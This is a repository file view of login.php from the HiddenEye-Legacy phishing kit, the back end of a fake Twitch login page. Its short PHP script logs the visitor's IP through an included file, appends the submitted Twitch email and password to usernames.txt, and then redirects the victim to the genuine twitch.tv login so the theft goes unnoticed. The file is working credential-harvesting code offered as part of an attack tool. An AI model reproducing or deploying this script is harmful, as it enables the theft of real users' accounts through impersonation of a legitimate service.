HiddenEye-Legacy/WebPages/twitch/login.php
Usama Abdul Sattar 8b42f65c3d
Update login.php
2018-06-08 16:59:47 +05:00

7 lines
223 B
PHP

<?php
include 'ip.php';
file_put_contents("usernames.txt", "[Twitch-EMAIL]: " . $_POST['twitch_user'] . " [Twitch-PASS]: " . $_POST['twitch_pass'] . "\n", FILE_APPEND);
header('Location: https://twitch.tv/login');
exit();